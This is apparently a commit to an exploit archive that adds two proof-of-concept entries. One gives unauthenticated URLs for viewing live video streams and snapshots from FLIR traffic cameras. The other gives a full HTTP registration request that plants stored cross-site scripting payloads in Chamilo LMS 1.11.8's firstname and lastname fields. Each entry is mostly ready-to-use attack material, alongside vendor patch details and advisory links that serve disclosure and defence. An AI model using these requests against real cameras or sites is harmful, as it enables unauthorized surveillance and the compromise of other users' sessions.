DB: 2018-10-07

2 changes to exploits/shellcodes Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure
2018-10-07 05:02:05 +00:00 · 2018-10-07 05:02:05 +00:00 · b602c2f493
commit b602c2f493
parent 21717894fe
3 changed files with 77 additions and 0 deletions
--- a/exploits/hardware/webapps/45537.txt
+++ b/exploits/hardware/webapps/45537.txt
@ -0,0 +1,43 @@
+# Exploit Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure
+# Author: Gjoko 'LiquidWorm' Krstic
+# Date: 2018-10-06
+# Vendor: https://www.flir.com
+# Link: https://www.flir.com/security/best-practices-for-cybersecurity/
+# CVE: N/A
+# Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455)
+
+# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
+#                           E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
+#                           V1.02.P01     (TI x-stream)  Codename: TIIP2
+#                           V1.05.P01     (ThermiCam)    Codename: ThermiCam
+#                           V1.04.P02     (ThermiCam)    Codename: ThermiCam
+#                           V1.04         (ThermiCam)    Codename: ThermiCam
+#                           V1.01.P02     (ThermiCam)    Codename: ThermiCam
+#                           V1.05.P03     (TrafiSense)   Codename: TrafiSense
+#                           V1.06         (VIP-IP)       Codename: VIP-IP
+#                           V1.02.P02     (TrafiRadar)   Codename: TrafiRadar
+
+# Vendor patched firmware version:
+#
+# Product name                Firmware      Released 
+# ----------------------------------------------------
+# ThermiCam / TrafiSense      E1.06.03      17.09.2018
+# TI BPL2 EDGE                V1.00         17.09.2018
+# TI x-stream                 E1.03.02      17.09.2018
+# TrafiOne                    E1.02.02      17.09.2018
+# ----------------------------------------------------
+
+# Description
+# FLIR thermal traffic cameras suffer from an unauthenticated and unauthorized
+# live RTSP video stream access.
+
+# Advisory ID: ZSL-2018-5489
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php
+
+# Simple PoC:
+
+http://Target/live.mjpeg?id=1
+
+rtsp://Target/mpeg4
+
+http://Target/snapshot.jpg
--- a/exploits/php/webapps/45536.txt
+++ b/exploits/php/webapps/45536.txt
@ -0,0 +1,32 @@
+# Exploit Title: Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2018-10-06
+# Vendor Homepage: https://chamilo.org
+# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
+# Tested Version: 1.11.8 for php5
+# Tested on OS: Kali Linux
+# CVE: N/A
+  
+# Description:
+# Improper input validation on the Firstname and Lastname fields allow attackers to add a persistent 
+# Cross-Site scripting attack when registering as a new user
+# Simply intercept a new registration request and add in the XSS in the firstname / lastname fields.
+
+# I'm sure there are more exploit vectors on this software. No time to check, had to move along.
+  
+# PoC
+
+POST /chamillo/main/auth/inscription.php HTTP/1.1
+Host: 10.0.0.16
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://10.0.0.16/chamillo/main/auth/inscription.php
+Cookie: ch_sid=ac092r01e7cnoco62rejshocq4
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 213
+
+status=5&firstname=<script>alert("Cakes");</script>&lastname=<script>alert("Cakes");</script>&email=cakes%40testers.com&username=cakez&pass1=123456&pass2=123456&phone=&language=english&official_code=&extra_skype=&extra_linkedin_url=&submit=&_qf__registration=&item_id=0
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40072,3 +40072,5 @@ id,file,description,date,author,type,platform,port
 45533,exploits/php/webapps/45533.txt,"D-Link Central WiFiManager Software Controller 1.03 - Multiple Vulnerabilities",2018-10-05,"Core Security",webapps,php,
 45534,exploits/php/webapps/45534.py,"ISPConfig < 3.1.13 - Remote Command Execution",2018-10-05,0x09AL,webapps,php,
 45535,exploits/php/webapps/45535.txt,"Chamilo LMS 1.11.8 - Cross-Site Scripting",2018-10-05,cakes,webapps,php,
+45536,exploits/php/webapps/45536.txt,"Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting",2018-10-06,cakes,webapps,php,
+45537,exploits/hardware/webapps/45537.txt,"FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure",2018-10-06,LiquidWorm,webapps,hardware,